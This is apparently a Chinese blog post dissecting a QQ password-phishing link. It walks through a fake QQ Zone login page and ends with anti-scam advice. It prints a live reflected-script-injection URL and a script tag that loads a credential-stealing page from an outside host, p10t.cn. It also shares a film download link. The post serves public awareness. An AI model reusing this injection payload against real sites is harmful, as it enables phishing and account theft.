您的位置:时间博客>随言>碎语>QQ盗号原理大揭秘-不要再被骗了

QQ盗号原理大揭秘-不要再被骗了

前言

相信大家在懵懂无知的时候都有被盗号的经历吧,QQ胡乱的加好友,突然有个好友传了个文件给你,打开以后发现QQ竟然显示强制下线,然后再也上不去了QAQ,很明显,QQ号被人盗了最近也是很多小伙伴私信我,也看了一些人发空间说QQ号被盗了啥的,以及我自己收到的一些诈骗请求网上针对防骗这块的文章几乎没有,为了不让更多的人受害,下面我将会以最真实朴素的语言介绍最常见的一种盗号诈骗方式,浅析一下这个盗号原理的全过程~~~希望大家不要再上当受骗啦~!

正文

下面我给大家介绍一种最常见的QQ诈骗方式

e8d0642fbc3829ba729937db1f445e01.jpg

这个是我今早收到的一条链接,相信不少朋友肯定也收到类似的链接吧,甚至乎很多人都说因为点开这个链接被盗号吧只有不懂安全,没用安全意识的人才会这么说吧!!!

让我带大家来剖析一下这个东东吧~~~

很明显,你看这个域名看不出任何眉头,既然大家都不敢点,我就替大家点点看~~~

首先我们在手机端点开这个链接

a858a40b40ac144eed71f98ca576eab1.jpg

点开一看,我们可以看到,是一个QQ空间登录界面,这个界面就是一个欺骗用户的界面,为什么这么说呢,你把这个界面链接复制出来,用浏览器打开,你会发现网页无法打开,并且域名成了下面这个:

http://sdk.h5.gamedog.cn/apih5v2/getIsLogin/?callback=%00%00%00%00%00%00%00%3CscripT/src%3D//p10t.cn/app.php%3Faid%3D5%3E%3C/scripT%3E%3C!--&bqvoqvwqtujhigzkumjk.png

看样子域名被浏览器解析成了一张png图片,你可能会有点好奇这个,我们用pc端按照这个地址进行追踪,用F12查看网页源代码

36ff0645172957b917b1cf8947a76c5b.jpg

<scripT/src=//p10t.cn/app.php?aid=5></scripT><!--({"code":-2,"msg":"\u7528\u6237\u672a\u767b\u5f55"})

就只有这么一行,我们可以看到从登录页面输入完账号密码以后会跳转到一个app.php网页里面,我们循规蹈矩,直接去追踪访问那个界面

1911882542d610d38dedf1efaa89a62a.jpg

有点意思,网页从QQ空间进行跳转的

window.location.href = "http://qzone.qq.com";

学过JavaScript的朋友应该知道,location.href="网站链接",表示重新定向到新页面,同时刷新打开的这个页面;

这个意思是从一个伪QQ空间的页面上输入账户密码,这个页面被植入了php的恶意木马,通过跳转重定向,直接跳转到了木马网站去了,后台数据库并记录了这条信息,然后你的QQ号账户密码就被别人成功获取了~~~

如果不信的话,我们可以一起来试一试

首先输入账号密码我们就随便伪造一个,账号是3838438,密码就写一个mmpsbsbsb试试看!!!

773d92ac7c06018c013d3a57d4e5ee5f.jpg

这里还要说一点,我试的时候这里好像做的还挺真实的,防中文输入,我本来想直接开口大骂呢,hhhh,没给我这个机会

这里无论输入什么账号密码都可以过,除了中文无法检测,账号必须是一连串的数字,密码防了中文输入

然后我点击登录

b50c568610712bff0e9e4c78041912a8.jpg

看吧,直接就登录成功了,还有这张图片,这这这完全就是挑衅啊,竟然贴一张小狗的图片,是在考验我智商嘛?

我尝试了一下ping它的主页,ping p10t.cn

98bae37017999785665b3ad962d6eec0.jpg

ping通了,说明这个网站还活着

但是访问页面显示403错误,服务器拒绝访问,我不是很清楚如何绕过这一防线

09e1dcbabdf97a744187240450d6954d.jpg

那我也没辙了,技术不够精湛,我只能写下这篇文章记录一下,希望更多的人看到,不要再上当受骗了就好~~~

如果文章哪里写的有出入的地方,希望各位不吝赐教,如果有更好的解决方案,欢迎在评论区留言或私信给我~~~

关于其他类型的诈骗

可能有些人遇到一些其他的诈骗,比如电话诈骗,短信诈骗,推荐你们看一部电影,叫嘉年华,里面讲述的是关于电信诈骗的案件,这部电影是由真实事件改编而成的,非常推荐大家观看,里面有一些防诈骗的技巧,看完以后你会对常见的诈骗手段有了一个更深层次的了解

如果没有找到资源的小伙伴,我也会在文章中分享给你们一个百度云链接,保存以后下载观看即可:

链接:https://pan.baidu.com/s/1CrYJ9jtkSqqxzZSlzQTsqA 密码:2qlz

后记

关于盗号这一问题,我给大家提醒两句,只要少一点好奇心,少一点贪欲,多一点警惕之心,不管是什么类型的诈骗都不会出现在你身上,谨记哦

转载请注明本文标题和链接:《 QQ盗号原理大揭秘-不要再被骗了
分享到:

相关推荐

网友评论 0

未登陆 表情
Ctrl+Enter快速提交